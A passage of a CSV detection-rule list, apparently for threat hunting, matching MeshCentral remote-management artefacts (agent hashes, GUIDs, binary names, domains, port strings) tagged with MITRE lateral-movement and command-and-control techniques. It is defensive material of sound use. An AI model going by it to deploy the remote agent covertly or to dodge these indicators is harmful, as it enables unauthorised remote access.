"*7f68729cb251f5aa9ecba08e57f13c8a258ea3cb3c45e7f99881ca496a639d7e*",".{0,1000}7f68729cb251f5aa9ecba08e57f13c8a258ea3cb3c45e7f99881ca496a639d7e.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*8365dc72d291194a2b3bd59e36473db7404a219fe999c50dad3d793c3a3178e4*",".{0,1000}8365dc72d291194a2b3bd59e36473db7404a219fe999c50dad3d793c3a3178e4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*8cec1c5a5e6e7e7a7b2d2991e12587228ed2aa9428b1af003ff68dd6bd6994a4*",".{0,1000}8cec1c5a5e6e7e7a7b2d2991e12587228ed2aa9428b1af003ff68dd6bd6994a4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*92f384f789dae517d1da7493322db430f5a7d4a6b7d7b74ca3b075bfac881b15*",".{0,1000}92f384f789dae517d1da7493322db430f5a7d4a6b7d7b74ca3b075bfac881b15.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*96fb297f3cba18a95a7228a4853a0641d193859999a5488b0cbae6efe708e89c*",".{0,1000}96fb297f3cba18a95a7228a4853a0641d193859999a5488b0cbae6efe708e89c.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*a0c293a144cb66f4b07d8bd7d52a489b89c2ff30af9427c399e400bc3d374505*",".{0,1000}a0c293a144cb66f4b07d8bd7d52a489b89c2ff30af9427c399e400bc3d374505.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*aeabd0eed04e87b955809822a4696df781a25ccb649f097a523d1cb4cf93a567*",".{0,1000}aeabd0eed04e87b955809822a4696df781a25ccb649f097a523d1cb4cf93a567.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#filehash","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*AgentCore/MeshServer_*",".{0,1000}AgentCore\/MeshServer_.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*alt.meshcentral.com*",".{0,1000}alt\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - 
T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*c0b17012581f088528c73adb9f228a99bad35ee0a9f74e1a93e688f95d11080f*",".{0,1000}c0b17012581f088528c73adb9f228a99bad35ee0a9f74e1a93e688f95d11080f.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*c3f35c99bf40d43b4eaa759a92f9a1bc5fc3ddcd0f35d338302a9e88cbdf995a*",".{0,1000}c3f35c99bf40d43b4eaa759a92f9a1bc5fc3ddcd0f35d338302a9e88cbdf995a.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*c75e682dd8f063bd0c151b30095bae8061146928f6d8533ac983280ad2c6effc*",".{0,1000}c75e682dd8f063bd0c151b30095bae8061146928f6d8533ac983280ad2c6effc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*cc94b15863602ae52934d4c3c08db27c61c1530a483093b82a1029a41c4fbd60*",".{0,1000}cc94b15863602ae52934d4c3c08db27c61c1530a483093b82a1029a41c4fbd60.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*CE5AD78C-DBDF-4D81-9A69-41B1DF683115*",".{0,1000}CE5AD78C\-DBDF\-4D81\-9A69\-41B1DF683115.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*CE62CBEE-DAA8-4E5E-AAAA-1F6FC291AB94*",".{0,1000}CE62CBEE\-DAA8\-4E5E\-AAAA\-1F6FC291AB94.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*d3e630985cb4b429375d79dd506842da176a9cbe4e0afb992c694cab48f3e7ce*",".{0,1000}d3e630985cb4b429375d79dd506842da176a9cbe4e0afb992c694cab48f3e7ce.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*d8445e3bd78bac3cc8f8a3f23b68ab971fb85ff061059f8256e41c6b892374f4*",".{0,1000}d8445e3bd78bac3cc8f8a3f23b68ab971fb85ff061059f8256e41c6b892374f4.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*E377F156-BAED-4086-B534-3CC43164607A*",".{0,1000}E377F156\-BAED\-4086\-B534\-3CC43164607A.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","#GUIDproject","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*e7e6fcf7d0b2ce3732fbeb5c7e48bb4a2f9f8bbca49ad55d13a57e9abb661481*",".{0,1000}e7e6fcf7d0b2ce3732fbeb5c7e48bb4a2f9f8bbca49ad55d13a57e9abb661481.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*ff98ae3248a0c2d93b00ec2d426578a3b90aec301883662b8da0fb2a213d60ca*",".{0,1000}ff98ae3248a0c2d93b00ec2d426578a3b90aec301883662b8da0fb2a213d60ca.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","#filehash","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*https://meshcentral.com/login*",".{0,1000}https\:\/\/meshcentral\.com\/login.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","1","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*info.meshcentral.com*",".{0,1000}info\.meshcentral\.com.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MESH_AGENT_PORT*",".{0,1000}MESH_AGENT_PORT.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*MESH_AGENT_STUN_PORT*",".{0,1000}MESH_AGENT_STUN_PORT.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*MeshAgent Crash Dumps*",".{0,1000}MeshAgent\sCrash\sDumps.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent.exe*",".{0,1000}meshagent\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent.js*",".{0,1000}meshagent\.js.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent.mpkg*",".{0,1000}MeshAgent\.mpkg.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent.pid*",".{0,1000}meshagent\.pid.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent.service*",".{0,1000}meshagent\.service.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent.zip*",".{0,1000}meshagent\.zip.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_aarch64*",".{0,1000}meshagent_aarch64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*meshagent_aarch64-cortex-a53*",".{0,1000}meshagent_aarch64\-cortex\-a53.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_alpine-x86-64*",".{0,1000}meshagent_alpine\-x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_android.apk*",".{0,1000}meshagent_android\.apk.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_arm*",".{0,1000}meshagent_arm.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_arm64*",".{0,1000}meshagent_arm64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" 
"*meshagent_armhf*",".{0,1000}meshagent_armhf.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_freebsd_x86-64*",".{0,1000}meshagent_freebsd_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_mips*",".{0,1000}meshagent_mips.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_mips24kc*",".{0,1000}meshagent_mips24kc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_mipsel24kc*",".{0,1000}meshagent_mipsel24kc.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_openbsd_x86-64*",".{0,1000}meshagent_openbsd_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral 
is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_openwrt_x86_64*",".{0,1000}meshagent_openwrt_x86_64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx64.msh*",".{0,1000}meshagent_osx64\.msh.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx64_LaunchDaemon*",".{0,1000}meshagent_osx64_LaunchDaemon.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx-arm-64*",".{0,1000}meshagent_osx\-arm\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx-universal-64*",".{0,1000}meshagent_osx\-universal\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - 
T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx-x86-32*",".{0,1000}meshagent_osx\-x86\-32.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_osx-x86-64*",".{0,1000}meshagent_osx\-x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_pogo*",".{0,1000}meshagent_pogo.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_poky*",".{0,1000}meshagent_poky.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_poky64*",".{0,1000}meshagent_poky64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_x86*",".{0,1000}meshagent_x86.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent_x86-64*",".{0,1000}meshagent_x86\-64.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent32.exe*",".{0,1000}meshagent32\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagent64.exe*",".{0,1000}meshagent64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-Android-x86*",".{0,1000}MeshAgent\-Android\-x86.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*meshagentarm64.exe*",".{0,1000}meshagentarm64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-ChromeOS*",".{0,1000}MeshAgent\-ChromeOS.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-Linux-ARM-PlugPC*",".{0,1000}MeshAgent\-Linux\-ARM\-PlugPC.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-Linux-XEN-x86-32*",".{0,1000}MeshAgent\-Linux\-XEN\-x86\-32.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-NodeJS*",".{0,1000}MeshAgent\-NodeJS.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgentOSXPackager.zip*",".{0,1000}MeshAgentOSXPackager\.zip.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-WinMinCore-Console-x86-32.exe*",".{0,1000}MeshAgent\-WinMinCore\-Console\-x86\-32\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshAgent-WinMinCore-Service-x86-64.exe*",".{0,1000}MeshAgent\-WinMinCore\-Service\-x86\-64\.exe.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","1","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*Meshcentral - WebRTC Sample Server*",".{0,1000}Meshcentral\s\-\sWebRTC\sSample\sServer.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshAgent","1","0","N/A","N/A","10","3","210","82","2024-08-12T17:16:44Z","2017-10-12T21:26:52Z" "*MeshCentral HTTP server port *",".{0,1000}MeshCentral\sHTTP\sserver\sport\s.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 
- T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentral Satellite could not create a 802.1x profile for this device*",".{0,1000}MeshCentral\sSatellite\scould\snot\screate\sa\s802\.1x\sprofile\sfor\sthis\sdevice.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentral Server TCP ports*",".{0,1000}MeshCentral\sServer\sTCP\sports.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://github.com/Ylianst/MeshCentral","1","0","N/A","N/A","10","10","3900","529","2024-08-30T12:17:18Z","2017-08-28T16:21:11Z" "*MeshCentral Server UDP ports*",".{0,1000}MeshCentral\sServer\sUDP\sports.{0,1000}","greyware_tool_keyword","meshcentral","MeshCentral is a full computer management web site - abused by attackers","T1021 - T1071 - T1090","TA0003 - TA0008 - 